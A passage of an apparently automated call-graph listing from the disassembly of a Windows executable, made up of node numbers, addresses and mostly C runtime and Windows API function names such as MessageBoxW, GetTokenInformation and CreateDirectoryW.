16452->16455 16453->16463 16515 7ff6404f37b4 16453->16515 16455->16463 16521 7ff6404f3878 16455->16521 16457 7ff6404eb870 _log10_special 8 API calls 16459 7ff6404f310a 16457->16459 16459->16430 16460->16463 16464 7ff6404f2ffc 16460->16464 16550 7ff6404f3ae0 16460->16550 16463->16457 16464->16463 16556 7ff6404fdd18 16464->16556 16466 7ff6404f2734 16465->16466 16467 7ff6404f271e 16465->16467 16468 7ff6404f2774 16466->16468 16471 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16466->16471 16467->16468 16469 7ff6404f2d06 16467->16469 16470 7ff6404f2d77 16467->16470 16468->16430 16472 7ff6404f2da1 16469->16472 16473 7ff6404f2d0c 16469->16473 16474 7ff6404f2dd0 16470->16474 16475 7ff6404f2d7c 16470->16475 16471->16468 16483 7ff6404f1074 38 API calls 16472->16483 16478 7ff6404f2d40 16473->16478 16479 7ff6404f2d11 16473->16479 16481 7ff6404f2dda 16474->16481 16482 7ff6404f2de7 16474->16482 16487 7ff6404f2ddf 16474->16487 16476 7ff6404f2db1 16475->16476 16477 7ff6404f2d7e 16475->16477 16485 7ff6404f0c64 38 API calls 16476->16485 16480 7ff6404f2d20 16477->16480 16489 7ff6404f2d8d 16477->16489 16484 7ff6404f2d17 16478->16484 16478->16487 16479->16482 16479->16484 16486 7ff6404f3478 47 API calls 16480->16486 16501 7ff6404f2e10 16480->16501 16481->16472 16481->16487 16488 7ff6404f39cc 45 API calls 16482->16488 16497 7ff6404f2d3b 16483->16497 16484->16480 16490 7ff6404f2d52 16484->16490 16484->16497 16485->16497 16486->16497 16491 7ff6404f1484 38 API calls 16487->16491 16487->16501 16488->16497 16489->16472 16492 7ff6404f2d92 16489->16492 16493 7ff6404f37b4 46 API calls 16490->16493 16490->16501 16491->16497 16495 7ff6404f3878 37 API calls 16492->16495 16492->16501 16493->16497 16494 7ff6404eb870 _log10_special 8 API calls 16496 7ff6404f310a 16494->16496 16495->16497 16496->16430 16498 7ff6404f3ae0 45 API calls 16497->16498 16500 7ff6404f2ffc 16497->16500 16497->16501 16498->16500 16499 7ff6404fdd18 46 API calls 16499->16500 16500->16499 16500->16501 16501->16494 16775 7ff6404f02e8 16502->16775 16506 7ff6404f349e 16505->16506 16568 7ff6404efea0 16506->16568 16511 7ff6404f35e3 16513 7ff6404f3ae0 45 API calls 16511->16513 16514 7ff6404f3671 16511->16514 16512 7ff6404f3ae0 45 API calls 16512->16511 16513->16514 16514->16460 16516 7ff6404f37e9 16515->16516 16517 7ff6404f382e 16516->16517 16518 7ff6404f3807 16516->16518 16519 7ff6404f3ae0 45 API calls 16516->16519 16517->16460 16520 7ff6404fdd18 46 API calls 16518->16520 16519->16518 16520->16517 16524 7ff6404f3899 16521->16524 16522 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16523 7ff6404f38ca 16522->16523 16523->16460 16524->16522 16524->16523 16526 7ff6404f10a7 16525->16526 16527 7ff6404f10d6 16526->16527 16529 7ff6404f1193 16526->16529 16531 7ff6404f1113 16527->16531 16707 7ff6404eff48 16527->16707 16530 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16529->16530 16530->16531 16531->16460 16533 7ff6404f0c97 16532->16533 16534 7ff6404f0cc6 16533->16534 16536 7ff6404f0d83 16533->16536 16535 7ff6404eff48 12 API calls 16534->16535 16538 7ff6404f0d03 16534->16538 16535->16538 16537 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16536->16537 16537->16538 16538->16460 16540 7ff6404f3a0f 16539->16540 16542 7ff6404f3a13 __crtLCMapStringW 16540->16542 16715 7ff6404f3a68 16540->16715 16542->16460 16544 7ff6404f14b7 16543->16544 16545 7ff6404f14e6 16544->16545 16547 7ff6404f15a3 16544->16547 16546 7ff6404eff48 12 API calls 16545->16546 16549 7ff6404f1523 16545->16549 16546->16549 16548 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16547->16548 16548->16549 16549->16460 16551 7ff6404f3af7 16550->16551 16719 7ff6404fccc8 16551->16719 16557 7ff6404fdd49 16556->16557 16563 7ff6404fdd57 16556->16563 16558 7ff6404fdd77 16557->16558 16559 7ff6404f3ae0 45 API calls 16557->16559 16557->16563 16560 7ff6404fddaf 16558->16560 16561 7ff6404fdd88 16558->16561 16559->16558 16560->16563 16564 7ff6404fde3a 16560->16564 16565 7ff6404fddd9 16560->16565 16765 7ff6404ff3b0 16561->16765 16563->16464 16566 7ff6404febb0 _fread_nolock MultiByteToWideChar 16564->16566 16565->16563 16768 7ff6404febb0 16565->16768 16566->16563 16569 7ff6404efed7 16568->16569 16575 7ff6404efec6 16568->16575 16570 7ff6404fc90c _fread_nolock 12 API calls 16569->16570 16569->16575 16571 7ff6404eff04 16570->16571 16572 7ff6404eff18 16571->16572 16573 7ff6404f9c58 __free_lconv_num 11 API calls 16571->16573 16574 7ff6404f9c58 __free_lconv_num 11 API calls 16572->16574 16573->16572 16574->16575 16576 7ff6404fd880 16575->16576 16577 7ff6404fd8d0 16576->16577 16578 7ff6404fd89d 16576->16578 16577->16578 16580 7ff6404fd902 16577->16580 16579 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16578->16579 16589 7ff6404f35c1 16579->16589 16586 7ff6404fda15 16580->16586 16593 7ff6404fd94a 16580->16593 16581 7ff6404fdb07 16631 7ff6404fcd6c 16581->16631 16583 7ff6404fdacd 16624 7ff6404fd104 16583->16624 16585 7ff6404fda9c 16617 7ff6404fd3e4 16585->16617 16586->16581 16586->16583 16586->16585 16587 7ff6404fda5f 16586->16587 16590 7ff6404fda55 16586->16590 16607 7ff6404fd614 16587->16607 16589->16511 16589->16512 16590->16583 16592 7ff6404fda5a 16590->16592 16592->16585 16592->16587 16593->16589 16598 7ff6404f97b4 16593->16598 16596 7ff6404f9c10 _isindst 17 API calls 16597 7ff6404fdb64 16596->16597 16599 7ff6404f97c1 16598->16599 16600 7ff6404f97cb 16598->16600 16599->16600 16605 7ff6404f97e6 16599->16605 16601 7ff6404f43f4 _set_fmode 11 API calls 16600->16601 16602 7ff6404f97d2 16601->16602 16640 7ff6404f9bf0 16602->16640 16603 7ff6404f97de 16603->16589 16603->16596 16605->16603 16606 7ff6404f43f4 _set_fmode 11 API calls 16605->16606 16606->16602 16643 7ff6405033bc 16607->16643 16611 7ff6404fd6bc 16612 7ff6404fd711 16611->16612 16613 7ff6404fd6dc 16611->16613 16616 7ff6404fd6c0 16611->16616 16696 7ff6404fd200 16612->16696 16692 7ff6404fd4bc 16613->16692 16616->16589 16618 7ff6405033bc 38 API calls 16617->16618 16619 7ff6404fd42e 16618->16619 16620 7ff640502e04 37 API calls 16619->16620 16621 7ff6404fd47e 16620->16621 16622 7ff6404fd482 16621->16622 16623 7ff6404fd4bc 45 API calls 16621->16623 16622->16589 16623->16622 16625 7ff6405033bc 38 API calls 16624->16625 16626 7ff6404fd14f 16625->16626 16627 7ff640502e04 37 API calls 16626->16627 16628 7ff6404fd1a7 16627->16628 16629 7ff6404fd1ab 16628->16629 16630 7ff6404fd200 45 API calls 16628->16630 16629->16589 16630->16629 16632 7ff6404fcde4 16631->16632 16633 7ff6404fcdb1 16631->16633 16635 7ff6404fcdfc 16632->16635 16637 7ff6404fce7d 16632->16637 16634 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16633->16634 16639 7ff6404fcddd memcpy_s 16634->16639 16636 7ff6404fd104 46 API calls 16635->16636 16636->16639 16638 7ff6404f3ae0 45 API calls 16637->16638 16637->16639 16638->16639 16639->16589 16641 7ff6404f9a88 _invalid_parameter_noinfo 37 API calls 16640->16641 16642 7ff6404f9c09 16641->16642 16642->16603 16644 7ff64050340f fegetenv 16643->16644 16645 7ff64050713c 37 API calls 16644->16645 16649 7ff640503462 16645->16649 16646 7ff64050348f 16651 7ff6404f97b4 __std_exception_copy 37 API calls 16646->16651 16647 7ff640503552 16648 7ff64050713c 37 API calls 16647->16648 16650 7ff64050357c 16648->16650 16649->16647 16652 7ff64050352c 16649->16652 16653 7ff64050347d 16649->16653 16654 7ff64050713c 37 API calls 16650->16654 16655 7ff64050350d 16651->16655 16656 7ff6404f97b4 __std_exception_copy 37 API calls 16652->16656 16653->16646 16653->16647 16657 7ff64050358d 16654->16657 16658 7ff640504634 16655->16658 16662 7ff640503515 16655->16662 16656->16655 16660 7ff640507330 20 API calls 16657->16660 16659 7ff6404f9c10 _isindst 17 API calls 16658->16659 16661 7ff640504649 16659->16661 16667 7ff6405035f6 memcpy_s 16660->16667 16663 7ff6404eb870 _log10_special 8 API calls 16662->16663 16664 7ff6404fd661 16663->16664 16688 7ff640502e04 16664->16688 16665 7ff64050399f memcpy_s 16666 7ff640503637 memcpy_s 16685 7ff640503a93 memcpy_s 16666->16685 16687 7ff640503f7b memcpy_s 16666->16687 16667->16665 16667->16666 16671 7ff6404f43f4 _set_fmode 11 API calls 16667->16671 16668 7ff640502f20 37 API calls 16673 7ff6405043f7 16668->16673 16669 7ff640503cdf 16669->16668 16670 7ff64050464c memcpy_s 37 API calls 16670->16669 16672 7ff640503a70 16671->16672 16674 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16672->16674 16677 7ff64050464c memcpy_s 37 API calls 16673->16677 16681 7ff640504452 16673->16681 16674->16666 16675 7ff640503c8b 16675->16669 16675->16670 16676 7ff6405045d8 16678 7ff64050713c 37 API calls 16676->16678 16677->16681 16678->16662 16679 7ff6404f43f4 11 API calls _set_fmode 16679->16687 16680 7ff6404f43f4 11 API calls _set_fmode 16680->16685 16681->16676 16683 7ff640502f20 37 API calls 16681->16683 16686 7ff64050464c memcpy_s 37 API calls 16681->16686 16682 7ff6404f9bf0 37 API calls _invalid_parameter_noinfo 16682->16685 16683->16681 16684 7ff6404f9bf0 37 API calls _invalid_parameter_noinfo 16684->16687 16685->16675 16685->16680 16685->16682 16686->16681 16687->16669 16687->16675 16687->16679 16687->16684 16689 7ff640502e23 16688->16689 16690 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16689->16690 16691 7ff640502e4e memcpy_s 16689->16691 16690->16691 16691->16611 16693 7ff6404fd4e8 memcpy_s 16692->16693 16694 7ff6404f3ae0 45 API calls 16693->16694 16695 7ff6404fd5a2 memcpy_s 16693->16695 16694->16695 16695->16616 16697 7ff6404fd23b 16696->16697 16702 7ff6404fd288 memcpy_s 16696->16702 16698 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16697->16698 16699 7ff6404fd267 16698->16699 16699->16616 16700 7ff6404fd2f3 16701 7ff6404f97b4 __std_exception_copy 37 API calls 16700->16701 16706 7ff6404fd335 memcpy_s 16701->16706 16702->16700 16703 7ff6404f3ae0 45 API calls 16702->16703 16703->16700 16704 7ff6404f9c10 _isindst 17 API calls 16705 7ff6404fd3e0 16704->16705 16706->16704 16708 7ff6404eff7f 16707->16708 16713 7ff6404eff6e 16707->16713 16709 7ff6404fc90c _fread_nolock 12 API calls 16708->16709 16708->16713 16710 7ff6404effb0 16709->16710 16711 7ff6404f9c58 __free_lconv_num 11 API calls 16710->16711 16714 7ff6404effc4 16710->16714 16711->16714 16712 7ff6404f9c58 __free_lconv_num 11 API calls 16712->16713 16713->16531 16714->16712 16716 7ff6404f3a8e 16715->16716 16717 7ff6404f3a86 16715->16717 16716->16542 16718 7ff6404f3ae0 45 API calls 16717->16718 16718->16716 16720 7ff6404fcce1 16719->16720 16722 7ff6404f3b1f 16719->16722 16720->16722 16727 7ff640502614 16720->16727 16723 7ff6404fcd34 16722->16723 16724 7ff6404fcd4d 16723->16724 16726 7ff6404f3b2f 16723->16726 16724->16726 16762 7ff640501960 16724->16762 16726->16464 16739 7ff6404fa460 GetLastError 16727->16739 16730 7ff64050266e 16730->16722 16740 7ff6404fa484 FlsGetValue 16739->16740 16741 7ff6404fa4a1 FlsSetValue 16739->16741 16742 7ff6404fa49b 16740->16742 16758 7ff6404fa491 16740->16758 16743 7ff6404fa4b3 16741->16743 16741->16758 16742->16741 16744 7ff6404fdea8 _set_fmode 11 API calls 16743->16744 16746 7ff6404fa4c2 16744->16746 16745 7ff6404fa50d SetLastError 16747 7ff6404fa52d 16745->16747 16748 7ff6404fa51a 16745->16748 16749 7ff6404fa4e0 FlsSetValue 16746->16749 16750 7ff6404fa4d0 FlsSetValue 16746->16750 16751 7ff6404f9814 _CreateFrameInfo 38 API calls 16747->16751 16748->16730 16761 7ff6404ff5e8 EnterCriticalSection 16748->16761 16754 7ff6404fa4fe 16749->16754 16755 7ff6404fa4ec FlsSetValue 16749->16755 16753 7ff6404fa4d9 16750->16753 16752 7ff6404fa532 16751->16752 16756 7ff6404f9c58 __free_lconv_num 11 API calls 16753->16756 16757 7ff6404fa204 _set_fmode 11 API calls 16754->16757 16755->16753 16756->16758 16759 7ff6404fa506 16757->16759 16758->16745 16760 7ff6404f9c58 __free_lconv_num 11 API calls 16759->16760 16760->16745 16763 7ff6404fa460 _CreateFrameInfo 45 API calls 16762->16763 16764 7ff640501969 16763->16764 16771 7ff640506098 16765->16771 16769 7ff6404febb9 MultiByteToWideChar 16768->16769 16773 7ff6405060fc 16771->16773 16772 7ff6404eb870 _log10_special 8 API calls 16774 7ff6404ff3cd 16772->16774 16773->16772 16774->16563 16776 7ff6404f032f 16775->16776 16777 7ff6404f031d 16775->16777 16780 7ff6404f033d 16776->16780 16784 7ff6404f0379 16776->16784 16778 7ff6404f43f4 _set_fmode 11 API calls 16777->16778 16779 7ff6404f0322 16778->16779 16781 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16779->16781 16782 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16780->16782 16789 7ff6404f032d 16781->16789 16782->16789 16783 7ff6404f06f5 16785 7ff6404f43f4 _set_fmode 11 API calls 16783->16785 16783->16789 16784->16783 16786 7ff6404f43f4 _set_fmode 11 API calls 16784->16786 16787 7ff6404f0989 16785->16787 16788 7ff6404f06ea 16786->16788 16790 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16787->16790 16791 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16788->16791 16789->16430 16790->16789 16791->16783 16793 7ff6404efa24 16792->16793 16822 7ff6404ef784 16793->16822 16795 7ff6404efa3d 16795->16047 16834 7ff6404ef6dc 16796->16834 16800 7ff6404e277c 16799->16800 16801 7ff6404f43f4 _set_fmode 11 API calls 16800->16801 16802 7ff6404e2799 16801->16802 16848 7ff6404f3ca4 16802->16848 16807 7ff6404e1bf0 49 API calls 16808 7ff6404e2807 16807->16808 16809 7ff6404e86b0 2 API calls 16808->16809 16810 7ff6404e281f 16809->16810 16811 7ff6404e2843 MessageBoxA 16810->16811 16812 7ff6404e282c MessageBoxW 16810->16812 16813 7ff6404e2855 16811->16813 16812->16813 16814 7ff6404eb870 _log10_special 8 API calls 16813->16814 16815 7ff6404e2865 16814->16815 16815->16076 16817 7ff6404e1b06 16816->16817 16818 7ff6404ef439 16816->16818 16817->16075 16817->16076 16819 7ff6404f43f4 _set_fmode 11 API calls 16818->16819 16820 7ff6404ef43e 16819->16820 16821 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16820->16821 16821->16817 16823 7ff6404ef7ee 16822->16823 16824 7ff6404ef7ae 16822->16824 16823->16824 16826 7ff6404ef7fa 16823->16826 16825 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16824->16825 16827 7ff6404ef7d5 16825->16827 16833 7ff6404f477c EnterCriticalSection 16826->16833 16827->16795 16835 7ff6404e19b9 16834->16835 16836 7ff6404ef706 16834->16836 16835->16053 16835->16054 16836->16835 16837 7ff6404ef715 memcpy_s 16836->16837 16838 7ff6404ef752 16836->16838 16840 7ff6404f43f4 _set_fmode 11 API calls 16837->16840 16847 7ff6404f477c EnterCriticalSection 16838->16847 16842 7ff6404ef72a 16840->16842 16844 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16842->16844 16844->16835 16850 7ff6404f3cfe 16848->16850 16849 7ff6404f3d23 16851 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16849->16851 16850->16849 16852 7ff6404f3d5f 16850->16852 16854 7ff6404f3d4d 16851->16854 16878 7ff6404f1f30 16852->16878 16857 7ff6404eb870 _log10_special 8 API calls 16854->16857 16855 7ff6404f3e3c 16856 7ff6404f9c58 __free_lconv_num 11 API calls 16855->16856 16856->16854 16859 7ff6404e27d8 16857->16859 16866 7ff6404f4480 16859->16866 16860 7ff6404f3e60 16860->16855 16863 7ff6404f3e6a 16860->16863 16861 7ff6404f3e11 16864 7ff6404f9c58 __free_lconv_num 11 API calls 16861->16864 16862 7ff6404f3e08 16862->16855 16862->16861 16865 7ff6404f9c58 __free_lconv_num 11 API calls 16863->16865 16864->16854 16865->16854 16867 7ff6404fa5d8 _set_fmode 11 API calls 16866->16867 16868 7ff6404f4497 16867->16868 16869 7ff6404e27df 16868->16869 16870 7ff6404fdea8 _set_fmode 11 API calls 16868->16870 16873 7ff6404f44d7 16868->16873 16869->16807 16871 7ff6404f44cc 16870->16871 16872 7ff6404f9c58 __free_lconv_num 11 API calls 16871->16872 16872->16873 16873->16869 17016 7ff6404fdf30 16873->17016 16876 7ff6404f9c10 _isindst 17 API calls 16877 7ff6404f451c 16876->16877 16879 7ff6404f1f6e 16878->16879 16884 7ff6404f1f5e 16878->16884 16880 7ff6404f1f77 16879->16880 16886 7ff6404f1fa5 16879->16886 16882 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16880->16882 16881 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16883 7ff6404f1f9d 16881->16883 16882->16883 16883->16855 16883->16860 16883->16861 16883->16862 16884->16881 16885 7ff6404f3ae0 45 API calls 16885->16886 16886->16883 16886->16884 16886->16885 16888 7ff6404f2254 16886->16888 16892 7ff6404f28c0 16886->16892 16918 7ff6404f2588 16886->16918 16948 7ff6404f1e10 16886->16948 16890 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16888->16890 16890->16884 16893 7ff6404f2975 16892->16893 16894 7ff6404f2902 16892->16894 16897 7ff6404f29cf 16893->16897 16898 7ff6404f297a 16893->16898 16895 7ff6404f299f 16894->16895 16896 7ff6404f2908 16894->16896 16965 7ff6404f0e70 16895->16965 16904 7ff6404f290d 16896->16904 16907 7ff6404f29de 16896->16907 16897->16895 16897->16907 16916 7ff6404f2938 16897->16916 16899 7ff6404f29af 16898->16899 16900 7ff6404f297c 16898->16900 16972 7ff6404f0a60 16899->16972 16902 7ff6404f291d 16900->16902 16906 7ff6404f298b 16900->16906 16917 7ff6404f2a0d 16902->16917 16951 7ff6404f3224 16902->16951 16904->16902 16908 7ff6404f2950 16904->16908 16904->16916 16906->16895 16910 7ff6404f2990 16906->16910 16907->16917 16979 7ff6404f1280 16907->16979 16908->16917 16961 7ff6404f36e0 16908->16961 16913 7ff6404f3878 37 API calls 16910->16913 16910->16917 16912 7ff6404eb870 _log10_special 8 API calls 16914 7ff6404f2ca3 16912->16914 16913->16916 16914->16886 16916->16917 16986 7ff6404fdb68 16916->16986 16917->16912 16919 7ff6404f2593 16918->16919 16920 7ff6404f25a9 16918->16920 16922 7ff6404f2975 16919->16922 16923 7ff6404f2902 16919->16923 16931 7ff6404f25e7 16919->16931 16921 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16920->16921 16920->16931 16921->16931 16926 7ff6404f29cf 16922->16926 16927 7ff6404f297a 16922->16927 16924 7ff6404f299f 16923->16924 16925 7ff6404f2908 16923->16925 16930 7ff6404f0e70 38 API calls 16924->16930 16933 7ff6404f290d 16925->16933 16935 7ff6404f29de 16925->16935 16926->16924 16926->16935 16947 7ff6404f2938 16926->16947 16928 7ff6404f29af 16927->16928 16929 7ff6404f297c 16927->16929 16934 7ff6404f0a60 38 API calls 16928->16934 16938 7ff6404f298b 16929->16938 16942 7ff6404f291d 16929->16942 16930->16947 16931->16886 16932 7ff6404f3224 47 API calls 16932->16947 16936 7ff6404f2950 16933->16936 16933->16942 16933->16947 16934->16947 16937 7ff6404f1280 38 API calls 16935->16937 16945 7ff6404f2a0d 16935->16945 16939 7ff6404f36e0 47 API calls 16936->16939 16936->16945 16937->16947 16938->16924 16940 7ff6404f2990 16938->16940 16939->16947 16943 7ff6404f3878 37 API calls 16940->16943 16940->16945 16941 7ff6404eb870 _log10_special 8 API calls 16944 7ff6404f2ca3 16941->16944 16942->16932 16942->16945 16943->16947 16944->16886 16945->16941 16946 7ff6404fdb68 47 API calls 16946->16947 16947->16945 16947->16946 16999 7ff6404f0034 16948->16999 16952 7ff6404f3246 16951->16952 16953 7ff6404efea0 12 API calls 16952->16953 16954 7ff6404f328e 16953->16954 16955 7ff6404fd880 46 API calls 16954->16955 16956 7ff6404f3361 16955->16956 16957 7ff6404f3ae0 45 API calls 16956->16957 16960 7ff6404f3383 16956->16960 16957->16960 16958 7ff6404f3ae0 45 API calls 16959 7ff6404f340c 16958->16959 16959->16916 16960->16958 16960->16959 16960->16960 16962 7ff6404f3760 16961->16962 16963 7ff6404f36f8 16961->16963 16962->16916 16963->16962 16964 7ff6404fdb68 47 API calls 16963->16964 16964->16962 16966 7ff6404f0ea3 16965->16966 16967 7ff6404f0ed2 16966->16967 16969 7ff6404f0f8f 16966->16969 16968 7ff6404efea0 12 API calls 16967->16968 16971 7ff6404f0f0f 16967->16971 16968->16971 16970 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16969->16970 16970->16971 16971->16916 16973 7ff6404f0a93 16972->16973 16974 7ff6404f0ac2 16973->16974 16976 7ff6404f0b7f 16973->16976 16975 7ff6404efea0 12 API calls 16974->16975 16978 7ff6404f0aff 16974->16978 16975->16978 16977 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16976->16977 16977->16978 16978->16916 16980 7ff6404f12b3 16979->16980 16981 7ff6404f12e2 16980->16981 16983 7ff6404f139f 16980->16983 16982 7ff6404efea0 12 API calls 16981->16982 16985 7ff6404f131f 16981->16985 16982->16985 16984 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16983->16984 16984->16985 16985->16916 16987 7ff6404fdb90 16986->16987 16988 7ff6404fdbd5 16987->16988 16990 7ff6404f3ae0 45 API calls 16987->16990 16991 7ff6404fdbbe memcpy_s 16987->16991 16995 7ff6404fdb95 memcpy_s 16987->16995 16988->16991 16988->16995 16996 7ff6404ffaf8 16988->16996 16989 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16989->16995 16990->16988 16991->16989 16991->16995 16995->16916 16998 7ff6404ffb1c WideCharToMultiByte 16996->16998 17000 7ff6404f0073 16999->17000 17001 7ff6404f0061 16999->17001 17004 7ff6404f0080 17000->17004 17007 7ff6404f00bd 17000->17007 17002 7ff6404f43f4 _set_fmode 11 API calls 17001->17002 17003 7ff6404f0066 17002->17003 17005 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 17003->17005 17006 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 17004->17006 17013 7ff6404f0071 17005->17013 17006->17013 17008 7ff6404f0166 17007->17008 17010 7ff6404f43f4 _set_fmode 11 API calls 17007->17010 17009 7ff6404f43f4 _set_fmode 11 API calls 17008->17009 17008->17013 17012 7ff6404f0210 17009->17012 17011 7ff6404f015b 17010->17011 17014 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 17011->17014 17015 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 17012->17015 17013->16886 17014->17008 17015->17013 17020 7ff6404fdf4d 17016->17020 17017 7ff6404fdf52 17018 7ff6404f44fd 17017->17018 17019 7ff6404f43f4 _set_fmode 11 API calls 17017->17019 17018->16869 17018->16876 17021 7ff6404fdf5c 17019->17021 17020->17017 17020->17018 17023 7ff6404fdf9c 17020->17023 17022 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 17021->17022 17022->17018 17023->17018 17024 7ff6404f43f4 _set_fmode 11 API calls 17023->17024 17024->17021 17026 7ff6404f7555 17025->17026 17027 7ff6404f7568 17025->17027 17029 7ff6404f43f4 _set_fmode 11 API calls 17026->17029 17035 7ff6404f71cc 17027->17035 17031 7ff6404f755a 17029->17031 17033 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 17031->17033 17032 7ff6404f7566 17032->16094 17033->17032 17042 7ff6404ff5e8 EnterCriticalSection 17035->17042 17044 7ff6404e7c13 __std_exception_destroy 17043->17044 17045 7ff6404e7b91 GetTokenInformation 17043->17045 17047 7ff6404e7c2c 17044->17047 17048 7ff6404e7c26 CloseHandle 17044->17048 17046 7ff6404e7bb2 GetLastError 17045->17046 17049 7ff6404e7bbd 17045->17049 17046->17044 17046->17049 17047->16103 17048->17047 17049->17044 17050 7ff6404e7bd9 GetTokenInformation 17049->17050 17050->17044 17051 7ff6404e7bfc 17050->17051 17051->17044 17052 7ff6404e7c06 ConvertSidToStringSidW 17051->17052 17052->17044 17054 7ff6404e297a 17053->17054 17338 7ff6404e3f70 108 API calls 17337->17338 17339 7ff6404e1463 17338->17339 17340 7ff6404e146b 17339->17340 17341 7ff6404e148c 17339->17341 17342 7ff6404e25f0 53 API calls 17340->17342 17343 7ff6404ef9f4 73 API calls 17341->17343 17344 7ff6404e147b 17342->17344 17345 7ff6404e14a1 17343->17345 17344->16162 17346 7ff6404e14a5 17345->17346 17347 7ff6404e14c1 17345->17347 17348 7ff6404e2760 53 API calls 17346->17348 17349 7ff6404e14f1 17347->17349 17350 7ff6404e14d1 17347->17350 17356 7ff6404e14bc __std_exception_destroy 17348->17356 17353 7ff6404e14f7 17349->17353 17358 7ff6404e150a 17349->17358 17351 7ff6404e2760 53 API calls 17350->17351 17351->17356 17352 7ff6404ef36c 74 API calls 17354 7ff6404e1584 17352->17354 17361 7ff6404e11f0 17353->17361 17354->16162 17356->17352 17357 7ff6404ef6bc _fread_nolock 53 API calls 17357->17358 17358->17356 17358->17357 17359 7ff6404e1596 17358->17359 17360 7ff6404e2760 53 API calls 17359->17360 17360->17356 17362 7ff6404e1248 17361->17362 17363 7ff6404e124f 17362->17363 17364 7ff6404e1277 17362->17364 17365 7ff6404e25f0 53 API calls 17363->17365 17367 7ff6404e1291 17364->17367 17368 7ff6404e12ad 17364->17368 17366 7ff6404e1262 17365->17366 17366->17356 17369 7ff6404e2760 53 API calls 17367->17369 17370 7ff6404e12bf 17368->17370 17378 7ff6404e12db memcpy_s 17368->17378 17374 7ff6404e12a8 __std_exception_destroy 17369->17374 17371 7ff6404e2760 53 API calls 17370->17371 17371->17374 17372 7ff6404ef6bc _fread_nolock 53 API calls 17372->17378 17373 7ff6404ef430 37 API calls 17373->17378 17374->17356 17375 7ff6404e139f 17378->17372 17378->17373 17378->17374 17378->17375 17379 7ff6404efdfc 17378->17379 17399 7ff6404e3f1a 17398->17399 17400 7ff6404e86b0 2 API calls 17399->17400 17401 7ff6404e3f3f 17400->17401 17402 7ff6404eb870 _log10_special 8 API calls 17401->17402 17403 7ff6404e3f67 17402->17403 17403->16186 17405 7ff6404e753e 17404->17405 17406 7ff6404e7662 17405->17406 17407 7ff6404e1bf0 49 API calls 17405->17407 17409 7ff6404eb870 _log10_special 8 API calls 17406->17409 17408 7ff6404e75c5 17407->17408 17408->17406 17411 7ff6404e1bf0 49 API calls 17408->17411 17412 7ff6404e3f10 10 API calls 17408->17412 17413 7ff6404e86b0 2 API calls 17408->17413 17410 7ff6404e7693 17409->17410 17410->16186 17411->17408 17412->17408 17414 7ff6404e7633 CreateDirectoryW 17413->17414 17414->17406 17414->17408 17416 7ff6404e15d3 17415->17416 17417 7ff6404e15f7 17415->17417 17504 7ff6404e1050 17416->17504 17418 7ff6404e3f70 108 API calls 17417->17418 17420 7ff6404e160b 17418->17420 17421 7ff6404e1613 17420->17421 17422 7ff6404e163b 17420->17422 17425 7ff6404e2760 53 API calls 17421->17425 17426 7ff6404e3f70 108 API calls 17422->17426 17423 7ff6404e15ee 17423->16186 17424 7ff6404e15d8 17424->17423 17427 7ff6404e25f0 53 API calls 17424->17427 17428 7ff6404e162a 17425->17428 17429 7ff6404e164f 17426->17429 17427->17423 17428->16186 17430 7ff6404e1671 17429->17430 17431 7ff6404e1657 17429->17431 17433 7ff6404ef9f4 73 API calls 17430->17433 17432 7ff6404e25f0 53 API calls 17431->17432 17434 7ff6404e1667 17432->17434 17435 7ff6404e1686 17433->17435 17454 7ff6404e694b 17453->17454 17456 7ff6404e6904 17453->17456 17454->16186 17456->17454 17543 7ff6404f4250 17456->17543 17458 7ff6404e3b51 17457->17458 17459 7ff6404e3e90 49 API calls 17458->17459 17460 7ff6404e3b8b 17459->17460 17461 7ff6404e3e90 49 API calls 17460->17461 17462 7ff6404e3b9b 17461->17462 17463 7ff6404e3bbd 17462->17463 17464 7ff6404e3bec 17462->17464 17574 7ff6404e3ac0 17463->17574 17466 7ff6404e3ac0 51 API calls 17464->17466 17467 7ff6404e3bea 17466->17467 17502 7ff6404e1bf0 49 API calls 17501->17502 17503 7ff6404e3e24 17502->17503 17503->16186 17505 7ff6404e3f70 108 API calls 17504->17505 17506 7ff6404e108b 17505->17506 17507 7ff6404e1093 17506->17507 17508 7ff6404e10a8 17506->17508 17509 7ff6404e25f0 53 API calls 17507->17509 17510 7ff6404ef9f4 73 API calls 17508->17510 17515 7ff6404e10a3 __std_exception_destroy 17509->17515 17511 7ff6404e10bd 17510->17511 17512 7ff6404e10c1 17511->17512 17513 7ff6404e10dd 17511->17513 17515->17424 17544 7ff6404f428a 17543->17544 17545 7ff6404f425d 17543->17545 17547 7ff6404f42ad 17544->17547 17550 7ff6404f42c9 17544->17550 17546 7ff6404f43f4 _set_fmode 11 API calls 17545->17546 17555 7ff6404f4214 17545->17555 17548 7ff6404f4267 17546->17548 17549 7ff6404f43f4 _set_fmode 11 API calls 17547->17549 17552 7ff6404f9bf0 _invalid_parameter_noinfo 37 